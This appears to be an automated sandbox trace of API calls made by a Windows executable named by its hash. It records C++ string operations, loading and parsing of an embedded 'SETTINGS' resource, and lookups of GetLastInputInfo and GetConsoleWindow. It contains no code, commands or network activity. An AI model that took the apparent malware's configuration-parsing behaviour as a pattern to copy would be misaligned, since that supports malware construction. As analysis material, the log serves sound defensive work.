[0227.803] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x22027ad
[0227.803] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x415268
[0227.803] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.803] _onexit (_Func=0x402091) returned 0x402091
[0227.803] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415258
[0227.803] _onexit (_Func=0x4020c7) returned 0x4020c7
[0227.931] _onexit (_Func=0x402c3b) returned 0x402c3b
[0227.931] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4156c4
[0227.931] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4156d4
[0227.931] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415710
[0227.931] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415720
[0227.931] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415730
[0227.931] _onexit (_Func=0x4036b7) returned 0x4036b7
[0227.932] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415788
[0227.932] _onexit (_Func=0x406015) returned 0x406015
[0227.932] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4157b0
[0227.932] _onexit (_Func=0x40604a) returned 0x40604a
[0227.932] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4157d0
[0227.932] _onexit (_Func=0x40628c) returned 0x40628c
[0227.932] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4157e8
[0227.932] _onexit (_Func=0x4062c2) returned 0x4062c2
[0227.933] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4157f8
[0227.933] _onexit (_Func=0x4062f8) returned 0x4062f8
[0227.933] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415918
[0227.933] _onexit (_Func=0x40632e) returned 0x40632e
[0227.934] _onexit (_Func=0x407370) returned 0x407370
[0227.934] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415978
[0227.934] _onexit (_Func=0x4073a5) returned 0x4073a5
[0227.934] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415950
[0227.934] _onexit (_Func=0x4073db) returned 0x4073db
[0227.934] ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z () returned 0x415988
[0227.934] _onexit (_Func=0x407411) returned 0x407411
[0227.934] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415968
[0227.934] _onexit (_Func=0x407447) returned 0x407447
[0227.935] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415998
[0227.935] _onexit (_Func=0x409190) returned 0x409190
[0227.936] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415a00
[0227.936] _onexit (_Func=0x4091c6) returned 0x4091c6
[0227.936] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4159e8
[0227.936] _onexit (_Func=0x4091fc) returned 0x4091fc
[0227.936] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415a10
[0227.936] _onexit (_Func=0x409232) returned 0x409232
[0227.936] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4159c0
[0227.936] _onexit (_Func=0x409260) returned 0x409260
[0227.936] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415a48
[0227.936] _onexit (_Func=0x409e33) returned 0x409e33
[0227.937] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415a20
[0227.937] _onexit (_Func=0x409e68) returned 0x409e68
[0227.937] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415a90
[0227.937] _onexit (_Func=0x40d184) returned 0x40d184
[0227.938] ??0Init@ios_base@std@@QAE@XZ () returned 0x415b01
[0227.938] _onexit (_Func=0x40d64e) returned 0x40d64e
[0227.938] ??0_Winit@std@@QAE@XZ () returned 0x415b00
[0227.938] _onexit (_Func=0x40d67a) returned 0x40d67a
[0227.938] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415ad8
[0227.938] _onexit (_Func=0x40d6a8) returned 0x40d6a8
[0227.938] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415b08
[0227.938] _onexit (_Func=0x40d6dd) returned 0x40d6dd
[0227.938] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415b18
[0227.938] _onexit (_Func=0x40d713) returned 0x40d713
[0227.939] LoadLibraryA (lpLibFileName="User32.dll") returned 0x743d0000
[0227.939] GetProcAddress (hModule=0x743d0000, lpProcName="GetLastInputInfo") returned 0x743fe100
[0227.939] ??0Init@ios_base@std@@QAE@XZ () returned 0x415ba5
[0227.939] _onexit (_Func=0x40f866) returned 0x40f866
[0227.939] ??0_Winit@std@@QAE@XZ () returned 0x415ba4
[0227.939] _onexit (_Func=0x40f892) returned 0x40f892
[0227.939] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000
[0227.940] GetProcAddress (hModule=0x76720000, lpProcName="GetConsoleWindow") returned 0x76786370
[0227.940] GetStartupInfoA (in: lpStartupInfo=0x19ff24 | out: lpStartupInfo=0x19ff24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0227.940] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0227.943] FindResourceA (hModule=0x0, lpName="SETTINGS", lpType=0xa) returned 0x4160c8
[0227.943] LoadResource (hModule=0x0, hResInfo=0x4160c8) returned 0x416da4
[0227.943] LockResource (hResData=0x416da4) returned 0x416da4
[0227.943] SizeofResource (hModule=0x0, hResInfo=0x4160c8) returned 0x199
[0227.943] malloc (_Size=0xa9) returned 0x2202910
[0227.943] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fe4c
[0227.943] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x415950
[0227.943] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.943] malloc (_Size=0xef) returned 0x2202a98
[0227.943] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z () returned 0x19fa10
[0227.943] ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ () returned 0x2202b91
[0227.943] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fe5c
[0227.944] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.944] free (_Block=0x2202a98)
[0227.944] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19feb8
[0227.944] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.944] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fe7c
[0227.944] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x19fe6c
[0227.944] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fe4c
[0227.944] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.944] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x21
[0227.944] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.944] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.945] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.945] ??2@YAPAXI@Z () returned 0x2200ca0
[0227.945] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2200ca0
[0227.945] free (_Block=0x0)
[0227.945] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.945] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.945] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x25
[0227.945] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.945] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.945] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.945] ??2@YAPAXI@Z () returned 0x2202ac8
[0227.945] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202ac8
[0227.945] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202ad8
[0227.945] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.945] free (_Block=0x2200ca0)
[0227.945] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.945] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.945] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x28
[0227.945] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.945] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.945] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.945] ??2@YAPAXI@Z () returned 0x2202af0
[0227.945] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202af0
[0227.945] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202b00
[0227.945] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202b10
[0227.945] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.945] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.945] free (_Block=0x2202ac8)
[0227.945] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.945] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.945] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x2b
[0227.945] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.945] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.945] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.946] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202b20
[0227.946] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.946] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.946] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x2e
[0227.946] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.946] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.946] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.946] ??2@YAPAXI@Z () returned 0x2202cd0
[0227.980] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202cd0
[0227.980] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202ce0
[0227.980] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202cf0
[0227.980] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d00
[0227.980] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d10
[0227.980] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.980] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.980] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.980] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.980] free (_Block=0x2202af0)
[0227.980] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.980] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.980] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x31
[0227.980] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.980] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.980] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.980] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d20
[0227.980] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.980] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.980] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x34
[0227.980] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.980] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.980] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.980] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d30
[0227.980] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.980] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.980] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x37
[0227.980] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.980] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.980] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202d40
[0227.981] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.981] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.981] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x3a
[0227.981] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.981] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??2@YAPAXI@Z () returned 0x2202db8
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202db8
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202dc8
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202dd8
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202de8
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202df8
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e08
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e18
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e28
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e38
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] free (_Block=0x2202cd0)
[0227.981] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.981] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.981] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x3d
[0227.981] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.981] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.981] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.981] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e48
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.982] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x49
[0227.982] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.982] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.982] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.982] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e58
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.982] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x51
[0227.982] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.982] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.982] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.982] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e68
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.982] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x54
[0227.982] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.982] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.982] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.982] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e78
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.982] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x57
[0227.982] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.982] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.982] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.982] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e88
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.982] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.982] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x6a
[0227.982] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.984] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.984] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202e98
[0227.984] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.984] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.984] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x6d
[0227.984] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.984] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.984] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202ea8
[0227.984] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.984] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.984] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0x70
[0227.984] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.984] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.984] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.984] ??2@YAPAXI@Z () returned 0x2206688
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206688
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206698
[0227.984] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066a8
